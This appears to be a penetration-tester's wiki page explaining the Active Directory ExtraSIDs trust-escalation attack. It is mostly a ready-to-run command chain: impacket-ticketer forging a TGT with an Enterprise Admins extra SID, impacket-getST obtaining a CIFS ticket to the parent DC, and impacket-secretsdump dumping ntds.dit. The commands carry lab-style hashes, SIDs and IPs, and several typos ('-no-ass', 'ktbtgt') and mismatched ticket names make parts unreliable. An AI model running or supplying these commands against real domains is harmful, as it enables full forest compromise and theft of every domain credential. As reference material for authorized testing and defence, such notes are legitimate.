ExtraSIDs

The ExtraSID attack is a Kerberos-based privilege escalation technique that exploits trust relationships between AD domains.

By forging a TGT using the KRBTGT hash of a compromised domain and injecting an additional SID (Security Identifier) from a trusted domain—typically a high-privilege group such as Enterprise Admins—the attacker can impersonate privileged users in the trusted domain. This is achieved by populating the extra-sid or SIDHistory field in the forged ticket, which trusted DCs accept during ticket validation.

The attack allows unauthorized access to critical resources in the trusted domain, including DCs, and can result in full forest compromise.

# Get TGT for the target (RC4 hash)
impacket-ticketer -nthash 12b792603f994d46906474202b20b5d4 -domain-sid S-1-5-21-3056178012-3972705859-491075245 -domain internal.zsm.local -extra-sid S-1-5-21-2734290894-461713716-141835440-519 -spn krbtgt/zsm.local x7331

# Get TGT for the terget (krbtgt hash of the child domain)
impacket-ticketer -nthash 0540fe51ddd618f42a66ef059ac36441 -domain-sid S-1-5-21-3056178012-3972705859-491075245 -domain internal.zsm.local -extra-sid S-1-5-21-2734290894-461713716-141835440-519 -spn krbtgt/zsm.local x7331

# Export ticket to session
export KRB5CCNAME=./x7331.ccache

# Confirm the ticket's details
$ klist
Ticket cache: FILE:./tgt.ccache
Default principal: tgt@INTERNAL.ZSM.LOCAL

Valid starting       Expires              Service principal
06/13/2025 16:03:25  06/11/2035 16:03:25  ktbtgt/zsm.local@INTERNAL.ZSM.LOCAL
        renew until 06/11/2035 16:03:25

# Get ST using the TGT
$ impacket-getST -k -no-pass -debug -spn CIFS/ZPH-SVRDC01.zsm.local zsm.local/tgt@zsm.local -dc-ip 192.168.210.10

# Export ticket to session
$ export KRB5CCNAME=tgt@zsm.local

# Dump ntds.dit using the ST
$ impacket-secretsdump -k -no-ass -dc-ip 192.168.210.10 tgt@ZPH-SVRDC01.zsm.local -target-ip 192.168.210.10

PreviousExploits NextForests

Last updated 4 days ago

Was this helpful?